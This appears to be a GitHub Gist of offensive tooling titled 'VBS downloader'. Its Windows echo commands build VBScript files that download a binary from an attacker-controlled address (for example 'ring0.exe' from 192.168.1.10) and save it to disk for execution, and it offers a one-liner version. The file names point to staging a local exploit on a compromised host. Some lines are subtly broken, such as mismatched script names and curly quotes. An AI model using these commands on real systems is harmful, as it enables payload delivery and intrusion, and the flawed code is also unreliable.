Last active
November 9, 2019 15:21
-
-
Save chosenonehacks/1b49ed20c6dcccaa34993e77a08710b7 to your computer and use it in GitHub Desktop.
VBS downloader
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
echo strUrl = WScript.Arguments.Item(0):StrFile = WScript.Arguments.Item(1):Set Post = CreateObject(^"Msxml2.XMLHTTP^"):Set Shell = CreateObject(^"Wscript.Shell^"):Post.Open ^"GET^",strUrl,0:Post.Send():Set aGet = CreateObject(^"ADODB.Stream^"):aGet.Mode = 3:aGet.Type = 1:aGet.Open():aGet.Write(Post.responseBody):aGet.SaveToFile StrFile,2 > wget.vbs | |
#cscript.exe wget.vbs http://ip:port/filename C:\Windows\temp\filename | |
#Or... | |
# VBS downloader | |
echo Dim HTTPGET >> localexploit.vbs | |
echo Set HTTPGET = CreateObject(“Microsoft.XMLHTTP”) >> localexploit.vbs && | |
echo HTTPGET.Open “GET”, “http://192.168.1.10/ring0.exe”, false >> localexploit.vbs | |
echo HTTPGET.Send >> localexploit.vbs | |
echo DataBin = HTTPGET.ResponseBody >> localexploit.vbs | |
echo Const adTypeBinary=1 >> localexploit.vbs | |
echo Const adSaveCreateOverWrite=2 >> localexploit.vbs | |
echo Dim SendBinary >> localexploit.vbs | |
echo Set SendBinary = CreateObject(“ADODB.Stream”) >> localexploit.vbs | |
echo SendBinary.Type = adTypeBinary >> localexploit.vbs | |
echo SendBinary.Open >> localexploit.vbs | |
echo SendBinary.Write DataBin >> localexploit.vbs | |
echo SendBinary.SaveToFile “ring0.exe”, adSaveCreateOverWrite >> localexploit.vbs | |
cscript //Nologo /B runexploit.vbs | |
#OneLiner | |
echo Dim HTTPGET >> localexploit.vbs && echo Set HTTPGET = CreateObject(“Microsoft.XMLHTTP”) >> localexploit.vbs && echo HTTPGET.Open “GET”, “http://192.168.1.10/ring0.exe”, false >> localexploit.vbs && echo HTTPGET.Send >> localexploit.vbs && echo DataBin = HTTPGET.ResponseBody >> localexploit.vbs && echo Const adTypeBinary=1 >> localexploit.vbs && echo Const adSaveCreateOverWrite=2 >> localexploit.vbs && echo Dim SendBinary >> localexploit.vbs && echo Set SendBinary = CreateObject(“ADODB.Stream”) >> localexploit.vbs && echo SendBinary.Type = adTypeBinary >> localexploit.vbs && echo SendBinary.Open >> localexploit.vbs && echo SendBinary.Write DataBin >> localexploit.vbs && echo SendBinary.SaveToFile “ring0.exe”, adSaveCreateOverWrite >> localexploit.vbs && cscript //Nologo /B runexploit.vbs |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment